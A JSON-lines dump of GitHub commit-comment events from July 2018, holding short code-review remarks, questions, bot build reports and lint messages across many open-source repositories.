{"id":"7936489961","type":"CommitCommentEvent","actor":{"login":"40huo"},"repo":{"name":"WhaleShark-Team/cobra"},"payload":{"comment":{"id":29638852,"position":null,"line":null,"path":null,"commit_id":"cffc941d044a1b74ed28356be87f08ee386de2a4","created_at":"2018-07-09T09:35:22Z","updated_at":"2018-07-09T09:35:22Z","author_association":"COLLABORATOR","body":"白名单的地方是在加规则扫描的时候起作用，依赖文件的目录有时候会导致在pickup阶段时间过长（因为pickup的时候没开多进程），所以是在pickup之前就忽略掉"}},"created_at":"2018-07-09T09:35:22Z"}
{"id":"7936491862","type":"CommitCommentEvent","actor":{"login":"agriggio"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29638853,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-09T09:35:43Z","updated_at":"2018-07-09T09:35:43Z","author_association":"COLLABORATOR","body":"@heckflosse Ingo, can you explain the logic of the `fromLastSave` parameter? Why is it needed?\r\nAlso, one (possible) downside of storing the info in the pp3 is that if we tweak the histmatching logic slightly (see e.g. #4659) then the change won't be visible to old pp3s... but maybe this is a feature? I don't know :-)\r\n"}},"created_at":"2018-07-09T09:35:43Z"}
{"id":"7936493341","type":"CommitCommentEvent","actor":{"login":"vlsi"},"repo":{"name":"jenkinsci/tikal-multijob-plugin"},"payload":{"comment":{"id":29638858,"position":20,"line":218,"path":"src/main/java/com/tikal/jenkins/plugins/multijob/views/MultiJobView.java","commit_id":"332c89a2e41e5b40c323c939e9ef0150eea81985","created_at":"2018-07-09T09:35:58Z","updated_at":"2018-07-09T09:35:58Z","author_association":"NONE","body":"Is there a reason the line is commented? If so it would be nice to have an explanation."}},"created_at":"2018-07-09T09:35:58Z"}
{"id":"7936493593","type":"CommitCommentEvent","actor":{"login":"cottonspace"},"repo":{"name":"cottonspace/docxdoclet"},"payload":{"comment":{"id":29638859,"position":null,"line":null,"path":null,"commit_id":"e24f6154ad11aec6db093327f06c4cf42cc4c29a","created_at":"2018-07-09T09:36:00Z","updated_at":"2018-07-09T09:36:00Z","author_association":"OWNER","body":"If you want to output only the public element, instead of putting an \"isPublic()\" condition, you should specify javadoc access attribute is \"private\" in Ant script (javadoc.xml). You can only output \"public\" scope in original source code.\r\n\r\n<javadoc access=\"**private**\" additionalparam=\"-encoding utf-8\" packagenames=\"doclet.docx\" sourcepath=\"src\">\r\nto\r\n<javadoc access=\"**public**\" additionalparam=\"-encoding utf-8\" packagenames=\"doclet.docx\" sourcepath=\"src\">"}},"created_at":"2018-07-09T09:36:00Z"}
{"id":"7936494369","type":"CommitCommentEvent","actor":{"login":"valkuc"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29638861,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T09:36:09Z","updated_at":"2018-07-09T09:36:09Z","author_association":"NONE","body":"Am I correctly understand that previously os_malloc allocated memory from DRAM and now to make our code compatible with this change we need to replace all occurrences of os_malloc with os_malloc_dram?"}},"created_at":"2018-07-09T09:36:09Z"}
{"id":"7936495313","type":"CommitCommentEvent","actor":{"login":"balthazar"},"repo":{"name":"LedgerHQ/ledger-live-desktop"},"payload":{"comment":{"id":29638864,"position":null,"line":null,"path":null,"commit_id":"576b4b050600e1ec0ecde631b45e2f17a006e18b","created_at":"2018-07-09T09:36:18Z","updated_at":"2018-07-09T09:36:18Z","author_association":"NONE","body":"![](http://elpincheblog.com/wp-content/uploads/2016/02/anigif_enhanced-19920-1407333002-1.gif)"}},"created_at":"2018-07-09T09:36:18Z"}
{"id":"7936499983","type":"CommitCommentEvent","actor":{"login":"davidcoutadeur"},"repo":{"name":"ltb-project/ppm"},"payload":{"comment":{"id":29638875,"position":null,"line":null,"path":null,"commit_id":"44165ed5a04decc7cb4fecc374065c760eceaeff","created_at":"2018-07-09T09:37:10Z","updated_at":"2018-07-09T09:37:10Z","author_association":"COLLABORATOR","body":"@dchikhaoui After inspecting the checkRDN code again because of a memory problem, I noticed this line:\r\n```\r\ntmpToken = strtok(lDN, \",+\");\r\n```\r\nWhat did you try with the + character? For information, \",+\" is not considered as a regex.\r\nSo I'd like to replace it with a simple \",\""}},"created_at":"2018-07-09T09:37:10Z"}
{"id":"7936507069","type":"CommitCommentEvent","actor":{"login":"davkal"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":29638892,"position":74,"line":74,"path":"public/app/containers/Explore/Explore.tsx","commit_id":"f1220fd2a4d46eacf9b28b3e5b4b1d91b9615856","created_at":"2018-07-09T09:38:35Z","updated_at":"2018-07-09T09:38:35Z","author_association":"CONTRIBUTOR","body":"Ah yes, I moved it into `state` because `render` uses it in line 205. The instance member should be removed."}},"created_at":"2018-07-09T09:38:35Z"}
{"id":"7936515171","type":"CommitCommentEvent","actor":{"login":"kirelagin"},"repo":{"name":"VinylRecords/Vinyl"},"payload":{"comment":{"id":29638940,"position":null,"line":null,"path":null,"commit_id":"dc2dfba6610815eb27de763b88920c43682c0dab","created_at":"2018-07-09T09:40:12Z","updated_at":"2018-07-09T09:40:12Z","author_association":"NONE","body":"@acowley Starting from base 4.11 (GHC 8.4) `(<>)` has no default implementation."}},"created_at":"2018-07-09T09:40:12Z"}
{"id":"7936516602","type":"CommitCommentEvent","actor":{"login":"VDLJu"},"repo":{"name":"ArduPilot/ardupilot"},"payload":{"comment":{"id":29638954,"position":null,"line":null,"path":null,"commit_id":"0750ed1b83514a1bca40d89ee52f1f18db26ab97","created_at":"2018-07-09T09:40:27Z","updated_at":"2018-07-09T09:40:27Z","author_association":"NONE","body":"If radio failSafe was set to \"Enabled Continue with Mission in AUTO\" it didn't follow operation defined in documentation. If it was not in AUTO mode, then it set failsafe to a \"LAND\" mode.\r\nhttp://ardupilot.org/copter/docs/radio-failsafe.html"}},"created_at":"2018-07-09T09:40:27Z"}
{"id":"7936533499","type":"CommitCommentEvent","actor":{"login":"Sta7e"},"repo":{"name":"johanngoltz/sumz-ui"},"payload":{"comment":{"id":29638988,"position":21,"line":44,"path":"src/app/service/scenarios.service.ts","commit_id":"98f3f7ba30deb5622fd2b379b4339a02e072af80","created_at":"2018-07-09T09:43:42Z","updated_at":"2018-07-09T09:43:42Z","author_association":"COLLABORATOR","body":"Das muss weg"}},"created_at":"2018-07-09T09:43:42Z"}
{"id":"7936534428","type":"CommitCommentEvent","actor":{"login":"JeremieBB"},"repo":{"name":"dataforgoodfr/dataforgoodfr.github.io"},"payload":{"comment":{"id":29638991,"position":4,"line":10,"path":"_projects/4_databox.md","commit_id":"736cd04aee5c2fbf79dd4e34eaaefbdb398e2495","created_at":"2018-07-09T09:43:53Z","updated_at":"2018-07-09T09:43:53Z","author_association":"NONE","body":"La « Databox » se veut être une bibliothèque ouverte regroupant un grand nombre de jeux de données et incitant ses utilisateurs à les publier, les réutiliser et les enrichir.\r\n\r\nElle est développée à partir de « udata », le moteur de la plateforme data.gouv.fr.\r\n\r\nL’objectif du projet est d’implémenter dans « udata » et donc dans la « Databox », de nouvelles fonctionnalités permettant de :\r\n•    pré-visualiser le jeu de données disponible\r\n•    explorer les données par un mécanisme de filtrage en ligne / tri."}},"created_at":"2018-07-09T09:43:53Z"}
{"id":"7936536892","type":"CommitCommentEvent","actor":{"login":"Kozzi11"},"repo":{"name":"vibe-d/vibe-core"},"payload":{"comment":{"id":29638997,"position":null,"line":null,"path":null,"commit_id":"5f18693c49a0c0a7359bb32fefd5f8719950a573","created_at":"2018-07-09T09:44:21Z","updated_at":"2018-07-09T09:44:21Z","author_association":"NONE","body":"This change caused https://github.com/vibe-d/vibe.d/issues/2184"}},"created_at":"2018-07-09T09:44:21Z"}
{"id":"7936537610","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638999,"position":null,"line":null,"path":null,"commit_id":"e72e2c13089bcbb77019734f39c52f6ca1e2d563","created_at":"2018-07-09T09:44:29Z","updated_at":"2018-07-09T09:44:29Z","author_association":"CONTRIBUTOR","body":"아 개인적인 생각이라 ㅎㅎ"}},"created_at":"2018-07-09T09:44:29Z"}
{"id":"7936538419","type":"CommitCommentEvent","actor":{"login":"NikVolf"},"repo":{"name":"paritytech/pwasm-std"},"payload":{"comment":{"id":29639001,"position":4,"line":13,"path":".travis.yml","commit_id":"4977523cb4a65cb7a6e1dc40e0a763d95554ae67","created_at":"2018-07-09T09:44:38Z","updated_at":"2018-07-09T09:44:38Z","author_association":"MEMBER","body":"😠 @pepyakin "}},"created_at":"2018-07-09T09:44:38Z"}
{"id":"7936541462","type":"CommitCommentEvent","actor":{"login":"AryanPatidar"},"repo":{"name":"AryanPatidar/HavocOS_device_xiaomi_rolex"},"payload":{"comment":{"id":29639007,"position":null,"line":null,"path":null,"commit_id":"673b1251fcd26d3a6669fc402c931ef38d8e3a1a","created_at":"2018-07-09T09:45:14Z","updated_at":"2018-07-09T09:45:14Z","author_association":"OWNER","body":"For those having issues with wcdma on first boot"}},"created_at":"2018-07-09T09:45:14Z"}
{"id":"7936542197","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/django-automationoauth"},"payload":{"comment":{"id":29639010,"position":13,"line":13,"path":"automationlookup/apps.py","commit_id":"228e417f4b13152c705710cfe214adfc17a18e3a","created_at":"2018-07-09T09:45:22Z","updated_at":"2018-07-09T09:45:22Z","author_association":"MEMBER","body":"typo"}},"created_at":"2018-07-09T09:45:22Z"}
{"id":"7936542571","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29639011,"position":26,"line":30,"path":"src/views/animation.html","commit_id":"7d182b244b117b159c85298cdf43be7cfeaadbce","created_at":"2018-07-09T09:45:26Z","updated_at":"2018-07-09T09:45:26Z","author_association":"CONTRIBUTOR","body":"for 裡面暫存的變數 i,j,k... 不用每次更換\r\n除非有兩層以上才需要換用 j, k"}},"created_at":"2018-07-09T09:45:26Z"}
{"id":"7936545149","type":"CommitCommentEvent","actor":{"login":"dchikhaoui"},"repo":{"name":"ltb-project/ppm"},"payload":{"comment":{"id":29639014,"position":null,"line":null,"path":null,"commit_id":"44165ed5a04decc7cb4fecc374065c760eceaeff","created_at":"2018-07-09T09:45:54Z","updated_at":"2018-07-09T09:45:54Z","author_association":"CONTRIBUTOR","body":"In LDAP the RDN can be composed of more than one attributes. In that case, the + sign is used. Example :  `OU=Sales+CN=J.Smith`\r\nSo the entire DN could be : `OU=Sales+CN=J.Smith,DC=example,DC=com`\r\n"}},"created_at":"2018-07-09T09:45:54Z"}
{"id":"7936548270","type":"CommitCommentEvent","actor":{"login":"diegopradogesto"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29639018,"position":8,"line":111,"path":"plugins/UM3NetworkPrinting/ClusterUM3OutputDevice.py","commit_id":"ac0192f01f72c859effe05ae7ce9dc7a536d9220","created_at":"2018-07-09T09:46:29Z","updated_at":"2018-07-09T09:46:29Z","author_association":"CONTRIBUTOR","body":"Code-style: remove ';'"}},"created_at":"2018-07-09T09:46:29Z"}
{"id":"7936553012","type":"CommitCommentEvent","actor":{"login":"enovella"},"repo":{"name":"rednaga/APKiD"},"payload":{"comment":{"id":29639027,"position":null,"line":null,"path":null,"commit_id":"1737c0ea0e1066077afc30ccebdbfd468ed0ee84","created_at":"2018-07-09T09:47:24Z","updated_at":"2018-07-09T09:47:24Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-09T09:47:24Z"}
{"id":"7936553287","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29639028,"position":15,"line":19,"path":"src/views/animation.html","commit_id":"7d182b244b117b159c85298cdf43be7cfeaadbce","created_at":"2018-07-09T09:47:27Z","updated_at":"2018-07-09T09:47:27Z","author_association":"CONTRIBUTOR","body":"`this.getAttribute('id')` 可以直接用 `this.id`"}},"created_at":"2018-07-09T09:47:27Z"}
{"id":"7936553869","type":"CommitCommentEvent","actor":{"login":"sriramkandukuri"},"repo":{"name":"CESNET/libyang"},"payload":{"comment":{"id":29639030,"position":null,"line":null,"path":null,"commit_id":"404aea2a441c511ccaad6ec4c24ba88f386ef25d","created_at":"2018-07-09T09:47:33Z","updated_at":"2018-07-09T09:47:33Z","author_association":"NONE","body":"Can I revert this commit alone to support latest libyang for old compilers?"}},"created_at":"2018-07-09T09:47:33Z"}
{"id":"7936559056","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/itop-extensions"},"payload":{"comment":{"id":29639040,"position":null,"line":null,"path":null,"commit_id":"c042de3a52ed72222c5ff74c2b63d37c9b1589f1","created_at":"2018-07-09T09:48:30Z","updated_at":"2018-07-09T09:48:30Z","author_association":"OWNER","body":"#42 "}},"created_at":"2018-07-09T09:48:30Z"}
{"id":"7936559726","type":"CommitCommentEvent","actor":{"login":"pdemartino"},"repo":{"name":"graphql-java/graphql-spring-boot"},"payload":{"comment":{"id":29639042,"position":null,"line":null,"path":null,"commit_id":"9c732f36a4884a691f9787869f5d6e51ec14f646","created_at":"2018-07-09T09:48:38Z","updated_at":"2018-07-09T09:48:38Z","author_association":"NONE","body":"Is this working even if I publish graphiql under a path different than /graphiql? (eg: try to set graphiql.mapping=/admin/graphiql and all the request to static resources will end up in 404)"}},"created_at":"2018-07-09T09:48:38Z"}
{"id":"7936561035","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/django-automationoauth"},"payload":{"comment":{"id":29639045,"position":13,"line":13,"path":"automationoauth/apps.py","commit_id":"228e417f4b13152c705710cfe214adfc17a18e3a","created_at":"2018-07-09T09:48:53Z","updated_at":"2018-07-09T09:48:53Z","author_association":"MEMBER","body":"typo"}},"created_at":"2018-07-09T09:48:53Z"}
{"id":"7936561442","type":"CommitCommentEvent","actor":{"login":"pocmo"},"repo":{"name":"aperfilyev/focus-android"},"payload":{"comment":{"id":29639046,"position":10,"line":182,"path":"app/src/main/java/org/mozilla/focus/widget/LocaleListPreference.java","commit_id":"7d311d0f51b017f36022ee67a39a8aa1c6b50236","created_at":"2018-07-09T09:48:57Z","updated_at":"2018-07-09T09:48:57Z","author_association":"NONE","body":"Please add a comment explaining why we are doing this. :)"}},"created_at":"2018-07-09T09:48:57Z"}
{"id":"7936567348","type":"CommitCommentEvent","actor":{"login":"ianpaschal"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29639061,"position":8,"line":111,"path":"plugins/UM3NetworkPrinting/ClusterUM3OutputDevice.py","commit_id":"ac0192f01f72c859effe05ae7ce9dc7a536d9220","created_at":"2018-07-09T09:50:07Z","updated_at":"2018-07-09T09:50:07Z","author_association":"CONTRIBUTOR","body":"God I need help."}},"created_at":"2018-07-09T09:50:07Z"}
{"id":"7936568982","type":"CommitCommentEvent","actor":{"login":"ianpaschal"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29639066,"position":8,"line":111,"path":"plugins/UM3NetworkPrinting/ClusterUM3OutputDevice.py","commit_id":"ac0192f01f72c859effe05ae7ce9dc7a536d9220","created_at":"2018-07-09T09:50:27Z","updated_at":"2018-07-09T09:50:27Z","author_association":"CONTRIBUTOR","body":"Intense muscle memory."}},"created_at":"2018-07-09T09:50:27Z"}
{"id":"7936574000","type":"CommitCommentEvent","actor":{"login":"lamquangminh"},"repo":{"name":"lamquangminh/EVKey"},"payload":{"comment":{"id":29639082,"position":null,"line":null,"path":null,"commit_id":"969e894856e409d7ed631b74d503e5660526b4ea","created_at":"2018-07-09T09:51:24Z","updated_at":"2018-07-09T09:51:24Z","author_association":"OWNER","body":"Mình mới thử chuyển qua release, nhưng ngớ ra là nó không hỗ trợ Push bằng tool, phải kéo thả bằng tay,\r\nCòn để trong source thì ở nhà mình chỉ cần build, khi nào chắc gói thì mình nhấn nút Push ở nhà thì nó tự đẩy lên đây,\r\nNghĩ cảnh mỗi lần build xong phải dùng tay up lên chắc nản !!!"}},"created_at":"2018-07-09T09:51:24Z"}
{"id":"7936577397","type":"CommitCommentEvent","actor":{"login":"xcguang"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29639090,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T09:52:04Z","updated_at":"2018-07-09T09:52:04Z","author_association":"NONE","body":"Yes, if the dram is enough for you, you can replace it, even though you don't do it, it should work well.\r\nAnd if you need more memory, like creating more ssl connections, you'd better using os_malloc.\r\nIt will be allocated from dram automatically, if malloc memory fail from iram. But if you use os_malloc_dram to malloc, it will fail when dram is insufficient, and it doesn't be allocated from iram automatically.\r\n"}},"created_at":"2018-07-09T09:52:04Z"}
{"id":"7936577683","type":"CommitCommentEvent","actor":{"login":"ianpaschal"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29639091,"position":8,"line":111,"path":"plugins/UM3NetworkPrinting/ClusterUM3OutputDevice.py","commit_id":"ac0192f01f72c859effe05ae7ce9dc7a536d9220","created_at":"2018-07-09T09:52:07Z","updated_at":"2018-07-09T09:52:07Z","author_association":"CONTRIBUTOR","body":"Fixed in 413965a"}},"created_at":"2018-07-09T09:52:07Z"}
{"id":"7936590436","type":"CommitCommentEvent","actor":{"login":"michalvasko"},"repo":{"name":"CESNET/libyang"},"payload":{"comment":{"id":29639124,"position":null,"line":null,"path":null,"commit_id":"404aea2a441c511ccaad6ec4c24ba88f386ef25d","created_at":"2018-07-09T09:54:32Z","updated_at":"2018-07-09T09:54:32Z","author_association":"CONTRIBUTOR","body":"Hi,\r\nwe have always try to support as old dependencies as possible but for this bugfix we simply needed some newer C features. So no, if you revert it, you can get random SEGFAULTs because the tree being iterated over is not properly recognized without this commit.\r\n\r\nRegards,\r\nMichal"}},"created_at":"2018-07-09T09:54:32Z"}
{"id":"7936595433","type":"CommitCommentEvent","actor":{"login":"Er9y714"},"repo":{"name":"firemodels/fds"},"payload":{"comment":{"id":29639139,"position":null,"line":null,"path":null,"commit_id":"520a0e41b2118fc162df6cb7a4e479d497641485","created_at":"2018-07-09T09:55:29Z","updated_at":"2018-07-09T09:55:29Z","author_association":"NONE","body":"In addition to this, I also noticed the term \"`sign`\" in Userguide equation (12.7). Could you explain what that is? Thanks."}},"created_at":"2018-07-09T09:55:29Z"}
{"id":"7936596146","type":"CommitCommentEvent","actor":{"login":"ulrikpedersen"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29639140,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-09T09:55:36Z","updated_at":"2018-07-09T09:55:36Z","author_association":"MEMBER","body":"That would be great. I think should work too but I haven't yet tried to just remove the qsrv lib/dbd from the build..."}},"created_at":"2018-07-09T09:55:36Z"}
{"id":"7936596282","type":"CommitCommentEvent","actor":{"login":"jldl1n17"},"repo":{"name":"jldl1n17/Wikipedia"},"payload":{"comment":{"id":29639141,"position":null,"line":null,"path":null,"commit_id":"729395bb29ec6cf268960c6285a6c3eb905fed84","created_at":"2018-07-09T09:55:38Z","updated_at":"2018-07-09T09:55:38Z","author_association":"OWNER","body":"changes favorable"}},"created_at":"2018-07-09T09:55:38Z"}
{"id":"7936598181","type":"CommitCommentEvent","actor":{"login":"jldl1n17"},"repo":{"name":"jldl1n17/Wikipedia"},"payload":{"comment":{"id":29639142,"position":null,"line":null,"path":null,"commit_id":"729395bb29ec6cf268960c6285a6c3eb905fed84","created_at":"2018-07-09T09:55:59Z","updated_at":"2018-07-09T09:55:59Z","author_association":"OWNER","body":"changes favourable"}},"created_at":"2018-07-09T09:55:59Z"}
{"id":"7936600867","type":"CommitCommentEvent","actor":{"login":"autrimpo"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29639147,"position":null,"line":null,"path":null,"commit_id":"ea662567b2d323aa4066af83670d0f281a7ac647","created_at":"2018-07-09T09:56:29Z","updated_at":"2018-07-09T09:56:29Z","author_association":"CONTRIBUTOR","body":"The author is aware of the API change and is updating his projects already, so that's good.\r\nAs this is not a pressing issue (noone besides me compained yet?) I think we can wait for a new upstream release, unless of course you want to contribute a patch."}},"created_at":"2018-07-09T09:56:29Z"}
{"id":"7936609890","type":"CommitCommentEvent","actor":{"login":"imknown"},"repo":{"name":"JarvanMo/Android-OkHttp-Jerry"},"payload":{"comment":{"id":29639158,"position":5,"line":7,"path":"README.md","commit_id":"3924ed40118b06689ac46bbe86441f9ec6718c75","created_at":"2018-07-09T09:58:10Z","updated_at":"2018-07-09T09:58:10Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-09T09:58:10Z"}
{"id":"7940716752","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649305,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T00:00:25Z","updated_at":"2018-07-10T00:00:25Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T00:00:25Z"}
{"id":"7940718441","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649313,"position":127,"line":127,"path":"week-08/reddit-project/source/static/landing.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-10T00:00:57Z","updated_at":"2018-07-10T00:00:57Z","author_association":"NONE","body":"It looks good 👍 "}},"created_at":"2018-07-10T00:00:57Z"}
{"id":"7940720416","type":"CommitCommentEvent","actor":{"login":"jquense"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29649317,"position":5,"line":33,"path":"packages/gatsby-plugin-less/src/gatsby-node.js","commit_id":"a7a892dbec7545d4379c96fd01825a54cb2cf575","created_at":"2018-07-10T00:01:37Z","updated_at":"2018-07-10T00:01:37Z","author_association":"COLLABORATOR","body":"yes which is why the `filter(Boolean)` is added below to remove the `false`. So i'm not sure why it'd be complaining"}},"created_at":"2018-07-10T00:01:37Z"}
{"id":"7940722476","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29649322,"position":62,"line":56,"path":"src/NUnitFramework/nunitlite.tests/MakeRunSettingsTests.cs","commit_id":"d09def3521dca9be6fbd84fc483c555c4955afe3","created_at":"2018-07-10T00:02:20Z","updated_at":"2018-07-10T00:02:20Z","author_association":"CONTRIBUTOR","body":"This (as well as the next line) seems a strange addition"}},"created_at":"2018-07-10T00:02:20Z"}
{"id":"7940724708","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649331,"position":21,"line":158,"path":"week-08/reddit-project/source/routes.js","commit_id":"565253d5b267b64367459ae42362c47dff969363","created_at":"2018-07-10T00:03:05Z","updated_at":"2018-07-10T00:03:05Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-10T00:03:05Z"}
{"id":"7940725441","type":"CommitCommentEvent","actor":{"login":"sesaque"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29649335,"position":null,"line":null,"path":null,"commit_id":"bf4daba232eb3f8e5d89a5037835578516463245","created_at":"2018-07-10T00:03:19Z","updated_at":"2018-07-10T00:03:19Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar cálculo CEP](https://trello.com/c/XQScVBJb/208-implementar-c%C3%A1lculo-cep)"}},"created_at":"2018-07-10T00:03:19Z"}
{"id":"7940726045","type":"CommitCommentEvent","actor":{"login":"sesaque"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29649337,"position":null,"line":null,"path":null,"commit_id":"2a7718bb2b3cf5a51dc19248a2f9f9ab08a82de6","created_at":"2018-07-10T00:03:31Z","updated_at":"2018-07-10T00:03:31Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar cálculo CEP](https://trello.com/c/XQScVBJb/208-implementar-c%C3%A1lculo-cep)"}},"created_at":"2018-07-10T00:03:31Z"}
{"id":"7940726768","type":"CommitCommentEvent","actor":{"login":"anantoghosh"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29649340,"position":5,"line":33,"path":"packages/gatsby-plugin-less/src/gatsby-node.js","commit_id":"a7a892dbec7545d4379c96fd01825a54cb2cf575","created_at":"2018-07-10T00:03:48Z","updated_at":"2018-07-10T00:03:48Z","author_association":"NONE","body":"Oh did not see that"}},"created_at":"2018-07-10T00:03:48Z"}
{"id":"7940727203","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29649341,"position":null,"line":null,"path":null,"commit_id":"6cc860be095f92f0da280bf1ff97500c43014770","created_at":"2018-07-10T00:03:58Z","updated_at":"2018-07-10T00:03:58Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/custom-fields-alignment-on-user-profile/91595/5\n"}},"created_at":"2018-07-10T00:03:58Z"}
{"id":"7940728622","type":"CommitCommentEvent","actor":{"login":"riq-dfaubion"},"repo":{"name":"isislovecruft/python-gnupg"},"payload":{"comment":{"id":29649348,"position":null,"line":null,"path":null,"commit_id":"5d756ee44c1fe6904c81304573c1b958092c9f51","created_at":"2018-07-10T00:04:32Z","updated_at":"2018-07-10T00:04:32Z","author_association":"NONE","body":"Where should I look for context that explains this change?"}},"created_at":"2018-07-10T00:04:32Z"}
{"id":"7940730813","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649352,"position":4,"line":4,"path":"week-08/reddit-project/source/static/submit.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-10T00:05:20Z","updated_at":"2018-07-10T00:05:20Z","author_association":"NONE","body":"Use the host+port here, without the closing `/`"}},"created_at":"2018-07-10T00:05:20Z"}
{"id":"7940731954","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29649354,"position":11,"line":11,"path":"week-08/reddit-project/source/static/submit.js","commit_id":"18374990a20de9609594ba38d138e58aad3df053","created_at":"2018-07-10T00:05:45Z","updated_at":"2018-07-10T00:05:45Z","author_association":"NONE","body":"Add `/` here before the __posts__"}},"created_at":"2018-07-10T00:05:45Z"}
{"id":"7940736952","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29649382,"position":null,"line":null,"path":null,"commit_id":"a1f71388c1e5c489507f9c48de5fc4cf3759cc1c","created_at":"2018-07-10T00:07:39Z","updated_at":"2018-07-10T00:07:39Z","author_association":"NONE","body":"[R/datadocs.R:147:1:](https://github.com/jackwasey/icd/blob/a1f71388c1e5c489507f9c48de5fc4cf3759cc1c/R/datadocs.R#L147) *style:* **Lines should not be more than 120 characters.**\n```r\n​#'   \\url{https://www.cms.gov/Research-Statistics-Data-and-Systems/Statistics-Trends-and-Reports/Reports/Downloads/Pope_2000_2.pdf}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-10T00:07:39Z"}
{"id":"7940736999","type":"CommitCommentEvent","actor":{"login":"KoenigKrote"},"repo":{"name":"MEC402/tileViewer"},"payload":{"comment":{"id":29649383,"position":44,"line":32,"path":"src/Viewer/Annotations.cpp","commit_id":"3f4ca328e8e0a64700ca1eeb3d4af4d8ce9b0abb","created_at":"2018-07-10T00:07:40Z","updated_at":"2018-07-10T00:07:40Z","author_association":"CONTRIBUTOR","body":"It's best to put conditional wakeup locks inside of a \"while(ConditionalBoolFalse)\" loop to prevent spurious wakeups, otherwise the thread may wait and be woken up prematurely and continue execution\r\nhttps://en.wikipedia.org/wiki/Spurious_wakeup"}},"created_at":"2018-07-10T00:07:40Z"}
{"id":"7940739067","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/TatianaPovalyaeva"},"payload":{"comment":{"id":29649387,"position":22,"line":22,"path":"Week-08/Day-03/LogInForm/logInForm.html","commit_id":"1474d856ca097f41bcfd9c3199fd29951e74d5da","created_at":"2018-07-10T00:08:28Z","updated_at":"2018-07-10T00:08:28Z","author_association":"NONE","body":"Do not break it into new lines."}},"created_at":"2018-07-10T00:08:28Z"}
